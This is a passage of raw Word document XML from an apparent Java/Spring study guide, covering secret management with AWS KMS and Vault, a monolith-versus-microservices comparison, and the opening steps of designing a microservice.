    </w:p>
    <w:p w14:paraId="5FCDDEB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ep 3: Accessing Secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5F1F0"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Value("${password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F6DC3"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private String password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2A921"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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F484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Dynamic secret rotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4BE35"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Centralized and secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1DF1A"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BCA845">
          <v:rect id="_x0000_i2926" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6598DF3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7. Encrypt Application Properties with AWS KMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7CA4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Encrypt Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7A6F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aws kms encrypt --key-id alias/my-key --plaintext "secret123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DFD4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tore Encrypted Value in Config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B07BA"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pring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B44507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datasource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D00CF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    password: AQICAHgjsfjasdfo234...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F60B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Decrypt at Runtime:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E0A4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String decrypted = kmsClient.decrypt("AQICAHgjsfjasdfo234...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5DD9D4"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90512F">
          <v:rect id="_x0000_i2927" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7A7A26"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Best Practices for Secret Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BACDF5E"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Avoid Hardcoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Never store secrets directly in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2201F1A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Secure Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Limit access to secrets at the network and application levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9FE7E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Dynamic Rotation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use tools to rotate secrets periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490AC7C"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Audit and Logging:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitor access to secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D35FEE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Encryption at Rest and In Transit:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always encrypt sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8055C2"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use RBAC:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Role-based access for secret management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1566C0BB" w14:textId="77777777" w:rsidR="006A6C4D" w:rsidRPr="006A6C4D" w:rsidRDefault="00000000" w:rsidP="006A6C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7440C">
          <v:rect id="_x0000_i2928" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC83D4" w14:textId="77777777" w:rsidR="006A6C4D" w:rsidRPr="006A6C4D" w:rsidRDefault="006A6C4D" w:rsidP="006A6C4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A10D6"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Environment Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for simple setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44E41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Spring Cloud Config with Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for centralized configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F02ED7"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Integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS Secrets Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for cloud-native applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47419CC9"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jasypt</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for encrypted configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28AB14"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 xml:space="preserve">Apply </w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reduce the risk of secret leakage and unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237F2DD" w14:textId="77777777" w:rsidR="006A6C4D" w:rsidRPr="006A6C4D" w:rsidRDefault="006A6C4D" w:rsidP="006A6C4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6C4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By combining secure storage, encryption, and proper access control, you can effectively manage secrets in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09D0FE" w14:textId="77777777" w:rsidR="00013964" w:rsidRDefault="00000000" w:rsidP="0001396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79EAFB">
          <v:rect id="_x0000_i2929" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFAC95" w14:textId="2383727D" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="001A12CD" w:rsidP="00187C12">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D8DEB2E" w14:textId="15C70DB5" w:rsidR="00DD6512" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6512" w:rsidP="00CA653D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="706" w:name="_Toc197867920"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Microservices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="706"/>
    </w:p>
    <w:p w14:paraId="0994D3C6" w14:textId="77777777" w:rsidR="004B0E1A" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0E1A" w:rsidP="004B0E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEE38CE" w14:textId="3A5E2A09" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD291C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="707" w:name="_Toc197867921"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Monolith</w:t>
      </w:r>
      <w:r w:rsidR="004728CC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ic</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B"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amp;</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microservices and when to choose which?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="707"/>
    </w:p>
    <w:p w14:paraId="640602A9" w14:textId="55C9E744"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ic Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0802F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5D65A3E7"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2BD3413"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codebase and deployment unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F836E0E"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features share the same memory space and process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6021EEEC"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velop initially and suitable for small teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7AA6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930" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1F782"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croservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1270FCE3"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13A24EF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44A2A006"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is independently deployable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1E51E"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has its own data store (DB per service pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F68B2"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s can be written in different programming languages (polyglot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600425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931" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FED17C"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CE4B95" w14:paraId="7F8971A0" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34B76ADF"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icroservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="17F81F53" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56D8F9C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d system with many services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="7514F085" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24D670E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small codebases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="4E15D214" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5C20B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deployed independently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="0D7CA04B" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3629220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rizontal (scale individual services)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="49629AB7" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="011E0DB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itially, but scales well</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="7F0004D9" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66D649E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can use a different stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="73D4AAFD" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EC6FB5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due to inter-service dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="537A5596" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B0B2A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service failure doesn’t necessarily affect others</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="59888367" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17324EE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entralized DB per service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w14:paraId="5E727456" w14:textId="77777777" w:rsidTr="00146B8B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6525FAA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or messaging-based communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67E5F469"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932" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE52E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onolithic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B207F2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onolith when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BADD66"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eam is small (startups, MVPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC70EA"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lication is simple and won’t grow much.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15149934"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ick development and deployment is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52460B59"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re in the prototyping or early stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E3CA8"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933" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9E56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icroservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4186B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icroservices when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAEBF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is large, complex, and will grow over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439AF40A"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parts of the system need to scale independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90FBE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multiple teams working in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C7F59"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high availability, fault tolerance, and agility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E362D"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flexibility in tech stacks or deployment pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DD701" w14:textId="77777777" w:rsidR="00B607F4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B607F4" w:rsidP="00146B8B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1D42BB" w14:textId="414B7F42" w:rsidR="00146B8B" w:rsidRPr="00CE4B95" w:rsidRDefault="00146B8B" w:rsidP="00146B8B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095FCFD" w14:textId="27B5B23E"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nolith:</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logging platform, early-stage ERP, internal admin tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251755E5" w14:textId="0083CF91"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icroservices:</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E-commerce platforms, fintech apps, enterprise SaaS, streaming platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B46FFD2"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934" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A106B4" w14:textId="762F3564" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE0C0A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="708" w:name="_Toc197867922"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to design a microservice from scratch</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="708"/>
    </w:p>
    <w:p w14:paraId="33FED761" w14:textId="0E09251C" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="00D175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935" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC41DF"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Designing a Microservice from Scratch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407FAE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936" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71304EAB" w14:textId="197CFB88"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Understand the Business Requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546FA84"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rify the problem the microservice needs to solve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0598A8"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DDD (Domain-Driven Design) to define aggregates and entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261D89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937" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFFA12" w14:textId="3D8D8CFA"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Microservice Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E941C1" w14:textId="77777777" w:rsidR="009A756E" w:rsidRPr="00CE4B95" w:rsidRDefault="009A756E" w:rsidP="001C5037">
      <w:pPr>
        <w:ind w:firstLine="360"/>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k:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C7251"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s this microservice responsible for?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A41CC"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data does it own?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B2E09"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other services does it need to communicate with?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972041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xml:space="preserve"> For an E-commerce app, microservices could be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26137A4A"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 Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544728A5"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF31E2"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yment Service</w:t>
      </w:r>
    </w:p>
